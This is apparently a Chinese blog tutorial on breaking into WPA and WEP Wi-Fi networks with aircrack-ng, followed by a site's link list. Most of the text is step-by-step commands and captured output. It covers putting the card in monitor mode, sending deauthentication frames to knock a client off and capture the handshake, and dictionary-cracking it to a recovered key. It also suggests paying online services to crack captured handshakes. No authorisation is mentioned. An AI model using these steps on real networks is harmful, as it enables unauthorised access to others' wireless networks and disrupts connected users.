Aircrack破解無線網絡詳解

雖然無線破解現在有GUI版的，很少人使用aircrack這種命令行下的無線破解工具，不過我還是覺得命令行版的比GUI操作更自由～

就教下簡單的WPA破解，WEP現在很少人使用了，估計沒啥作用。不過等等還是在最後說下WEP的命令吧。

先介紹下Aircrack-ng套裝常用的幾個工具

airmon-ng：檢查wifi端口狀態和進入監控模式到工具

airodump-ng：掃描網絡並抓包的工具，跟aireplay-ng配合使用

aireplay-ng：數據包注入工具

aircrack-ng：數據包破解工具

0x01 ifconfig wlan0 up #激活無線網卡

0x02 airmoin-ng start wlan0 up #將無線網卡設置爲Monitor模式

0x03 airodump-ng -w 保存數據包路徑加文件名 -c 頻道 mon0 #開始抓包，可以加個--ivs參數來設定只抓ivs的數據

在這裏解釋一下，一般我們破解密碼只需要ivs數據包，如果不加ivs參數，它會默認保存爲cap文件，cap文件包含了各種數據，會導致文件過大，有時候cap文件會大到幾百M，如果你不是想分析裏面的數據，單單要破解密碼，推薦保存爲ivs。

0x04 開啓另一個bash窗口，輸入aireplay-ng -0 10 -a AP的Mac -c 客戶端的Mac mon0 #進行Deauth注入獲取WPA的握手包

0x05 aircrack-ng -w 字典路徑 ivs/cap文件路徑 #開始字典跑包破解密碼，當然你也可以拿到淘寶上面找人代跑、它們有強大到字典跟顯卡（GPU破解）這樣可以讓我們的破解速度跟成功率大大提高

----------------------思路交代完畢、下面是實戰----------------------

root@bt:~# ifconfig wlan0 up

root@bt:~# airmon-ng start wlan0 up

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]/usr/local/sbin/airmon-ng: line 631: [: up: integer expression expected

(monitor mode enabled on mon0)

---------------------

CH 7 ][ Elapsed: 52 s ][ 2013-04-22 19:02

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:10:77:1F:DA:44 -44 90 500 60 0 7 11e WPA2 CCMP PSK Netcore_2_4G

0E:34:CB:00:97:A2 -71 0 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>

C8:3A:35:3B:D1:00 -73 57 317 136 9 7 11e WPA CCMP PSK Tenda_3BD100

00:25:86:32:82:0A -74 0 6 0 0 6 54 . WPA2 CCMP PSK liaojie

78:44:76:01:3C:26 -76 78 476 0 0 7 54 WPA2 CCMP PSK ipTIME

00:34:CB:00:82:C5 -76 0 13 0 0 6 54e. WPA2 TKIP PSK <length: 0>

0E:34:CB:00:8B:18 -79 8 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>

06:34:CB:00:8B:18 -79 0 7 0 0 6 54e. OPN CMCC

00:34:CB:00:8B:18 -79 0 2 0 0 6 54e. WPA2 TKIP PSK <length: 0>

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 22

(not associated) 00:21:6B:5C:66:7A -78 0 - 1 0 1

(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 2

C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 11e-11e 0 77

[2]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0

root@bt:~#

BSSID是AP的Mac，STATION是客戶端到Mac，只有客戶端連接AP的時候才能實施抓包破解。（好像是這樣...大牛如果有其他到方法請說下）

在沒有注入攻擊之前，Frames跟#Data的數據量很少，這時候我們就要利用客戶端進行攻擊了

root@bt:~# aireplay-ng -0 10 -a C8:3A:35:3B:D1:00 -c 08:10:77:1F:DA:44 mon0

19:05:04 Waiting for beacon frame (BSSID: C8:3A:35:3B:D1:00) on channel 7

19:05:05 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [23|52 ACKs]

19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|52 ACKs]

19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [34|49 ACKs]

19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [27|46 ACKs]

19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [28|55 ACKs]

19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|49 ACKs]

19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [33|48 ACKs]

19:05:09 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [36|52 ACKs]

19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [40|59 ACKs]

19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [53|51 ACKs]

-0 後面加的是攻擊次數，如果你攻擊10次後沒有出現WPA handshake的話，就繼續攻擊。

我們在另一個窗口輸入攻擊命令後，返回airodump-ng界面，會發現右上角出現了WPA handshake的提示

CH 7 ][ Elapsed: 4 mins ][ 2013-04-22 19:09 ][ WPA handshake: C8:3A:35:3B:D1:00

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:10:77:1F:DA:44 -43 100 2603 295 0 7 11e WPA2 CCMP PSK Netcore_2_4G

00:34:CB:00:97:A2 -68 0 8 0 0 6 54e. WPA2 TKIP PSK <length: 0>

C8:3A:35:3B:D1:00 -71 100 783 638 0 7 11e WPA CCMP PSK Tenda_3BD100

06:34:CB:00:97:A2 -71 0 7 0 0 6 54e. OPN CMCC

00:25:86:32:82:0A -72 0 24 0 0 6 54 . WPA2 CCMP PSK liaojie

0A:34:CB:00:82:C5 -76 0 16 0 0 6 54e. WPA2 TKIP MGT <length: 0>

78:44:76:01:3C:26 -75 83 2252 0 0 7 54 WPA2 CCMP PSK ipTIME

00:34:CB:00:82:C5 -76 0 47 0 0 6 54e. WPA2 TKIP PSK <length: 0>

06:34:CB:00:8B:18 -78 0 8 0 0 6 54e. OPN CMCC

00:34:CB:00:8B:18 -79 11 6 0 0 6 54e. WPA2 TKIP PSK <length: 0>

0E:34:CB:00:8B:18 -79 0 9 0 0 6 54e. WPA2 TKIP MGT <length: 0>

06:34:CB:00:82:C5 -75 0 14 0 0 6 54e. OPN CMCC

0E:34:CB:00:97:A2 -66 0 14 0 0 6 54e. WPA2 TKIP MGT <length: 0>

8C:21:0A:D1:51:B4 -76 0 1 0 0 6 54e. WPA2 CCMP PSK 1024_D151B4

00:34:CB:00:76:6A -75 0 9 0 0 6 54e. WPA2 TKIP PSK <length: 0>

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 127

(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 12

C8:3A:35:3B:D1:00 E0:A6:70:D7:90:8E -1 11e- 0 0 36

C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 1e-11e 0 1672 Tenda_3BD100

8C:21:0A:D1:51:B4 70:F1:A1:1E:22:55 -80 0 - 1 0 11

[3]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0

root@bt:~#

WPA handshake 後面的Mac就是AP的Mac，AP指的是要破解的無線路由

開個窗口查看下ivs文件的大小

root@bt:~# cd /home

root@bt:/home# ls -al test-01.ivs

-rw-r--r-- 1 root root 6284 2013-04-22 18:55 test-01.ivs

6284字節，可以破解了（一般只要不是0字節，都可以破解），你可以把這個文件發給淘寶破解，也可以本地破解

root@bt:~# aircrack-ng -w /home/crack.txt /home/test-03.ivs

Opening /home/test-03.ivs

Read 33 packets.

# BSSID ESSID Encryption

1 08:10:77:1F:DA:44 Netcore_2_4G Unknown

2 78:44:76:01:3C:26 ipTIME Unknown

3 C8:3A:35:3B:D1:00 Tenda_3BD100 WPA (1 handshake)

4 0A:34:CB:00:76:6A CMCC-AUTO Unknown

5 06:34:CB:00:8B:18 CMCC Unknown

6 06:34:CB:00:76:6A CMCC Unknown

7 00:25:86:32:82:0A liaojie Unknown

8 06:34:CB:00:82:C5 CMCC Unknown

9 20:DC:E6:52:52:8E TP-LINK_ooo Unknown

10 06:34:CB:00:97:A2 CMCC Unknown

11 8C:21:0A:D1:51:B4 1024_D151B4 Unknown

Index number of target network ? 3 #你輸入破解命令後，它會讓你選擇你要破解的序號，“Encryption”只要這個下面有WPA字樣就說明這個序號下的AP已經抓到數據包，可以破解，這裏我選擇3

Opening /home/test-03.ivs

Reading packets, please wait...

這裏說下ivs文件的文件名，在aircrack-ng中，如果你輸入“test”這個名字，它會自動給你命名爲“test-01.ivs”，如果實施第二次抓包，它會生成名爲“test-02.ivs”，以此類推，因爲我寫這篇文章的時候測試了三次，所以是test-03.ivs

Aircrack-ng 1.1 r2178

[00:01:27] 72176 keys tested (814.02 k/s)

KEY FOUND! [ 0222XXXX ]

Master Key : D5 8B BC BE 46 3D 43 2D 5F 03 A9 2F 61 95 D6 DD

6C 13 ED 6F F9 A5 15 73 1C BB C2 FC 8E 34 CC DA

Transient Key : E5 55 3D E8 3F 89 4A 72 C2 BD E1 60 C7 CA DB AF

DB 08 A3 C4 C5 FC A9 B4 96 86 2D 46 A6 57 B8 A4

57 F6 09 42 94 E7 A7 FF 79 89 83 AB C2 00 13 26

F7 AA D8 60 B8 5A 0A DC 81 57 53 29 25 FD 17 A0

EAPOL HMAC : AE 6F C0 44 A3 E7 E4 32 DA 83 71 DF 48 26 32 05

root@bt:~#

破解結果，Key是0222XXXX

------------------------------------下面是WEP的破解大概過程----------------------------------------

0x01 ifconfig wlan0 up #激活無線網卡

0x02 airmon-ng start wlan0 up #將無線網卡設置爲Monitor模式

0x03 airodump-ng -w 保存數據包路徑 -c 頻道 --ivs mon0 #開始抓包

0x04 aireplay-ng -3 -b AP的Mac -h 客戶端的Mac mon0 #用ArpRequest 注入攻擊

0x05 aircrack-ng ivs/cap的路徑 #破解WEP，WEP不需要字典，一般數據夠多的話，幾分鐘就能破解出來了

------------------------------------------------------------------------------------------------

Aircrack破解無線網絡詳解

公司剛入職了一名 Java 中級開發，短短 4 行代碼居然湊齊了 3 個 bug！我哭了~~

Nginx R31 doc-13-Limiting Access to Proxied HTTP Resources 訪問限流

python包：pandas

中外程序員到底有啥區別？

Python數據分析與挖掘實戰（5章）

一、什麼是Docker

C++文件/流

二、Docker 組件

揹包九講一 01揹包

今天！通義靈碼在北京、成都、杭州三城開講啦

Aircrack破解無線網絡詳解

xmanager登錄unix和linux中文無法顯示問題

UNIX/Linux swapon命令參數及用法詳解

Mindjet.MindManager“參數錯誤”解決辦法，適用於9.0、10.0和14.0

VS2012及幫助(MSDN離線版)文檔官網下載

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結